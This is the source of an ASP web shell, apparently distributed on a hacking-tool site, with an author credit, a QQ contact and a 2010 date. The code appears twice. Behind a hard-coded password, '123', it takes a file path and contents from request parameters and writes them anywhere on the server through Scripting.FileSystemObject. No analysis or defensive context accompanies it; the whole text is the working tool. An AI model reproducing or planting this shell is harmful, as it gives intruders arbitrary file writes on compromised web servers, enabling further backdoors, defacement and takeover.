<%
on error resume next
%><% on error resume next %> <% if request("pass")="123" then '在这修改密码 session("pw")="go" end if %> <%if session("pw")<>"go" then %> <%="
"%> <%else%> <% set fso=server.createobject("scripting.filesystemobject") path=request("path") if path<>"" then data=request("da") set da=fso.createtextfile(path,true) da.write data if err=0 then %> <%="yes"%> <%else%> <%="no"%> <% end if err.clear end if da.close %> <%set da=nothing%> <%set fos=nothing%> <%=""%> <%=" write by EchoEye QQ:232789935 "%> <%="联系我"%> <%end if%><%
if request("pass")="123" then '在这修改密码
session("pw")="go"
end if
%><%if session("pw")<>"go" then %><%="
"%><%else%><%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%><%="yes"%><%else%><%="no"%><%
end if
err.clear
end if
da.close
%><%set da=nothing%><%set fos=nothing%><%=""%><%=" write by EchoEye QQ:232789935 "%><%="联系我"%><%end if%>
添加时间:2010/4/4 1:36:00